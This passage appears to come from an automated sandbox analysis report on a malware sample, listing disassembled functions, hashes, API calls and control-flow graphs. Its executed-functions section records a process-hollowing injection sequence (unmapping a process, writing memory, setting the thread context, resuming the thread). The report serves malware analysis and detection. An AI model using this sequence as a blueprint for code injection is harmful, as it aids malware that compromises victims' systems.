                    • Instruction Fuzzy Hash: 3C412732984348AFDB80AFA4DD80B9E3BFAEF04324F10442DEB3896191DB759545DF91
                    Function 021F84AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 746 21f84ab-21f84d9 call 21f8477 751 21f84db-21f84de 746->751 752 21f84f3-21f850b call 21f158d 746->752 753 21f84ed 751->753 754 21f84e0-21f84eb call 21f158d 751->754 759 21f850d-21f850f 752->759 760 21f8524-21f855a call 21f158d * 3 752->760 753->752 754->751 754->753 762 21f851e 759->762 763 21f8511-21f851c call 21f158d 759->763 771 21f855c-21f8562 760->771 772 21f856b-21f857e 760->772 762->760 763->759 763->762 771->772 773 21f8564-21f856a call 21f158d 771->773 777 21f858d-21f8594 772->777 778 21f8580-21f8587 call 21f158d 772->778 773->772 779 21f8596-21f859d call 21f158d 777->779 780 21f85a3-21f85ae 777->780 778->777 779->780 783 21f85cb-21f85cd 780->783 784 21f85b0-21f85bc 780->784 784->783 787 21f85be-21f85c5 call 21f158d 784->787 787->783
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ExitProcess___crt
                    • String ID:
                    • API String ID: 1022109855-0
                    • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction ID: fcdbafcb6e27fc47dac7c6a970716471b72290dc1d5b67cb51220de74b49fce6
                    • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction Fuzzy Hash: A331C331940650EFCBA1AF14FC8494977A6FB15334705862AEF28572B0CBB459CDAF94
                    Function 0221FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0221FC1F
                      • Part of subcall function 0220169C: std::exception::_Copy_str.LIBCMT ref: 022016B5
                    • __CxxThrowException@8.LIBCMT ref: 0221FC34
                    • std::exception::exception.LIBCMT ref: 0221FC4D
                    • __CxxThrowException@8.LIBCMT ref: 0221FC62
                    • std::regex_error::regex_error.LIBCPMT ref: 0221FC74
                      • Part of subcall function 0221F914: std::exception::exception.LIBCMT ref: 0221F92E
                    • __CxxThrowException@8.LIBCMT ref: 0221FC82
                    • std::exception::exception.LIBCMT ref: 0221FC9B
                    • __CxxThrowException@8.LIBCMT ref: 0221FCB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                    • String ID: leM
                    • API String ID: 3569886845-2926266777
                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction ID: 0be1762c174a248ffa1d1abc53f21e571e35b116323298e1c4fe48e6696b7762
                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction Fuzzy Hash: F711EF79C0030DB7CF04FFE5D895CDDBB7DAA04344B408566AD18A7685EB74A3588F94
                    Function 021DF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free_malloc_wprintf$_sprintf
                    • String ID:
                    • API String ID: 3721157643-0
                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction ID: 6cbab977913da5df9b358b4c6ed31a5b97bbb36e32158e45b797a95d82f73307
                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction Fuzzy Hash: 991127B2580550BEC2A1A6F40C11EFF3AED9F46311F040069FF6DD2180DB585B0597B1
                    Function 021E1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                    • String ID:
                    • API String ID: 65388428-0
                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction ID: 516c76277ea0a3b78a4ac4f5a48d789854044f0dc8f5cf269d5e89d11730e280
                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction Fuzzy Hash: A4513B71D80209BBEB11DBA5DC85FEFBBB9FB04744F140025FA09B6190E7745A058BA5
                    Function 021DF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction ID: c3a28e8d00a8fa0ff8bcc3b3bd1623eab89ea13d30d3506ad6912f52a3ec3532
                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction Fuzzy Hash: 53514CB1980209FBEF11DFA1DC46FEEBB79AB05704F100029F916B6180D775AA05CBA5
                    Function 021DF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction ID: 6370c9ab7f9c8cc96ed67f8fa9e3cf0c059fefd153e8752eab8fa3ddab94f293
                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction Fuzzy Hash: 5A514171D80209AADF21DFE5DC45FEEBBB9EB04704F100129F916B7180E7746A068BA5
                    Function 0221208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                    • String ID:
                    • API String ID: 3534693527-0
                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction ID: 7aaca2c142fe5addde1756edb86015d4ad7470ca39686dee586a5ab1e4c3ea10
                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction Fuzzy Hash: 8031F6329A0236EFDB21ABA49C00F6E27D69F25B64F114215FE14EB298DB748540CAA1
                    Function 022966D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • __getptd_noexit.LIBCMT ref: 022966DD
                      • Part of subcall function 021F59BF: __calloc_crt.LIBCMT ref: 021F59E2
                      • Part of subcall function 021F59BF: __initptd.LIBCMT ref: 021F5A04
                    • __calloc_crt.LIBCMT ref: 02296700
                    • __get_sys_err_msg.LIBCMT ref: 0229671E
                    • __invoke_watson.LIBCMT ref: 0229673B
                    • __get_sys_err_msg.LIBCMT ref: 0229676D
                    • __invoke_watson.LIBCMT ref: 0229678B
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                    • String ID:
                    • API String ID: 4066021419-0
                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction ID: bc8c6caece0d508570a687217d2ef2f422ca22acd80538ea4d6a7449406310ed
                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction Fuzzy Hash: 9811C13265031A7FEF257AA59C00BFB73CEEF007A0F410426FE18A6644E726D9004AE4
                    Function 021E2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: D
                    • API String ID: 2102423945-2746444292
                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction ID: 4cafe844795afe535b091322f8fa7c2993f7b02ad2010e4e5ec595f92e6106f4
                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction Fuzzy Hash: 97E15C71D40219ABDF24DFA0CD99FEEB7BCBF04304F144169EA0AA6190EB74AA45CF54
                    Function 021DD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: $$$(
                    • API String ID: 2102423945-3551151888
                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction ID: 0eee0bdc980b4a1b3a6294262dd2219fa94d4ee1b3e0a4b8ff3d6a4e0c2c080c
                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction Fuzzy Hash: 0E919B72D80218DAEF20CFA0DC59BEEBBB5AF06308F144068D51677280DBB65A48CF65
                    Function 021F5CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsnlen
                    • String ID: U
                    • API String ID: 3628947076-3372436214
                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction ID: 6050c27fa450500f70e8d989f975e035f12a8c5a8f80b8b450e7877309e3864d
                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction Fuzzy Hash: 1D21633219420C7EEB4097A4DC45BBE739EDB45350FD10065FB28C61C0FB71EE008694
                    Function 021EA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: p2Q
                    • API String ID: 2102423945-1521255505
                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction ID: 2da8ae39b027fab80fd36ffd12e858b901052e1e12686e60201d9156616135f9
                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction Fuzzy Hash: 6BF0E5786D8750A5F7517750FC267857D917B35B0CF104044D1142E2E1D3FE234C679A
                    Function 0221FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0221FBF1
                      • Part of subcall function 0220169C: std::exception::_Copy_str.LIBCMT ref: 022016B5
                    • __CxxThrowException@8.LIBCMT ref: 0221FC06
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                    • String ID: TeM$TeM
                    • API String ID: 3662862379-3870166017
                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction ID: 518f6f955a915787e87f348079a0d72a4d7c4a7de924d2bf7e3891463bdb47a0
                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction Fuzzy Hash: 22D06775C0030CBBCB04EFE5D499CDDBBBDAA04344B408466A918A7285EA74A3598F98
                    Function 021DD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 021F197D: __wfsopen.LIBCMT ref: 021F1988
                    • _fgetws.LIBCMT ref: 021DD15C
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wfsopen_fgetws
                    • String ID:
                    • API String ID: 853134316-0
                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction ID: 07c8f1e4c50ef65dce2bfc4a529718be623ba0b8ed9a43cfb8448a1ef9856b44
                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction Fuzzy Hash: A091B3B2D80319EBCF21DFA4DD857AFB7B5BF04304F150529E925A3240E775AA04CBA5
                    Function 021DD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$__except_handler4_fprintf
                    • String ID:
                    • API String ID: 1783060780-0
                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction ID: fa0537f2eacffcf1d8d6e6072d7401d441a61d10deb3865bb88e396c54c7c001
                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction Fuzzy Hash: CBA17DB1C40258EFEF11EFE4DC45BDEBB76AF15308F140028D5057A291D7BA5A48CBA6
                    Function 021F2AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                    • String ID:
                    • API String ID: 2974526305-0
                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction ID: 9d0ffbf273f7750da2e10942ca62e076ca2be441ab2e0625983786de97a30bc7
                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction Fuzzy Hash: 7851C370A403099FDBB8CFB9CC846AE77B6AF40324F148729EE39962D0D7759951CB41
                    Function 02211359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction ID: c5af7a318ee4ea6f5dea4867ee002b07efc57731fe7e5e0f0168919f7e9dfe9d
                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction Fuzzy Hash: 0C01393242014EBBCF125EC4DC01CEE3FA2BB29354B488515FA5998468D376C6B2AB81
                    Function 02297A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 02297A4B
                      • Part of subcall function 02298140: ___BuildCatchObjectHelper.LIBCMT ref: 02298172
                      • Part of subcall function 02298140: ___AdjustPointer.LIBCMT ref: 02298189
                    • _UnwindNestedFrames.LIBCMT ref: 02297A62
                    • ___FrameUnwindToState.LIBCMT ref: 02297A74
                    • CallCatchBlock.LIBCMT ref: 02297A98
                    Memory Dump Source
                    • Source File: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_21d0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction ID: 54ea21de71cd0e556272bcd434e9b2f8901e873c9f0c4ab8b9414613f4f34807
                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction Fuzzy Hash: CD01E972020209BBCF12AF95CC00EEA7BBAFF49754F158015FD1865124D776E961DFA0

                    Execution Graph

                    Execution Coverage:1.1%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:38
                    Total number of Limit Nodes:8
                    execution_graph 33581 2310000 33584 2310630 33581->33584 33583 2310005 33585 231064c 33584->33585 33587 2311577 33585->33587 33590 23105b0 33587->33590 33594 23105dc 33590->33594 33591 23105e2 GetFileAttributesA 33591->33594 33592 231061e 33594->33591 33594->33592 33595 2310420 33594->33595 33596 23104f3 33595->33596 33597 23104fa 33596->33597 33598 23104ff CreateWindowExA 33596->33598 33597->33594 33598->33597 33599 2310540 PostMessageA 33598->33599 33600 231055f 33599->33600 33600->33597 33602 2310110 VirtualAlloc GetModuleFileNameA 33600->33602 33603 2310414 33602->33603 33604 231017d CreateProcessA 33602->33604 33603->33600 33604->33603 33606 231025f VirtualFree VirtualAlloc Wow64GetThreadContext 33604->33606 33606->33603 33607 23102a9 ReadProcessMemory 33606->33607 33608 23102e5 VirtualAllocEx NtWriteVirtualMemory 33607->33608 33609 23102d5 NtUnmapViewOfSection 33607->33609 33610 231033b 33608->33610 33609->33608 33611 2310350 NtWriteVirtualMemory 33610->33611 33612 231039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33610->33612 33611->33610 33613 23103fb ExitProcess 33612->33613 33615 7b9026 33616 7b9035 33615->33616 33619 7b97c6 33616->33619 33621 7b97e1 33619->33621 33620 7b97ea CreateToolhelp32Snapshot 33620->33621 33622 7b9806 Module32First 33620->33622 33621->33620 33621->33622 33623 7b903e 33622->33623 33624 7b9815 33622->33624 33626 7b9485 33624->33626 33627 7b94b0 33626->33627 33628 7b94c1 VirtualAlloc 33627->33628 33629 7b94f9 33627->33629 33628->33629

                    Executed Functions

                    Function 02310110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02310156
                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0231016C
                    • CreateProcessA.KERNELBASE(?,00000000), ref: 02310255
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02310270
                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02310283
                    • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0231029F
                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023102C8
                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023102E3
                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02310304
                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0231032A
                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02310399
                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023103BF
                    • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023103E1
                    • ResumeThread.KERNELBASE(00000000), ref: 023103ED
                    • ExitProcess.KERNEL32(00000000), ref: 02310412
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                    • String ID:
                    • API String ID: 93872480-0
                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction ID: b0587619feb7eb846c5b2a885c669f1cadfed82744092192e2c91a1c402f373f
                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction Fuzzy Hash: D8B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AD81CF94
                    Function 02310420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 15 2310420-23104f8 17 23104fa 15->17 18 23104ff-231053c CreateWindowExA 15->18 19 23105aa-23105ad 17->19 20 2310540-2310558 PostMessageA 18->20 21 231053e 18->21 22 231055f-2310563 20->22 21->19 22->19 23 2310565-2310579 22->23 23->19 25 231057b-2310582 23->25 26 2310584-2310588 25->26 27 23105a8 25->27 26->27 28 231058a-2310591 26->28 27->22 28->27 29 2310593-2310597 call 2310110 28->29 31 231059c-23105a5 29->31 31->27
                    APIs
                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02310533
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateWindow
                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                    • API String ID: 716092398-2341455598
                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction ID: aad243b58d3dbd4b9bb8c07b9128e22594ce9af9aa3b8a76e7dc0dbd60aedcac
                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction Fuzzy Hash: AA513A70D08388DEEB15CBE8C849BDDBFB6AF11708F144058D9447F286C3BA5658CB62
                    Function 023105B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 32 23105b0-23105d5 33 23105dc-23105e0 32->33 34 23105e2-23105f5 GetFileAttributesA 33->34 35 231061e-2310621 33->35 36 2310613-231061c 34->36 37 23105f7-23105fe 34->37 36->33 37->36 38 2310600-231060b call 2310420 37->38 40 2310610 38->40 40->36
                    APIs
                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023105EC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID: apfHQ$o
                    • API String ID: 3188754299-2999369273
                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction ID: f40415482a24d46492d97d137132ae26c1da637fb552b0e39754e7c043e2196d
                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction Fuzzy Hash: 2A012170C0425CEEDF18DB98C5583AEBFB5AF41308F1480D9C8592B242D7769B98CBA1
                    Function 007B97C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
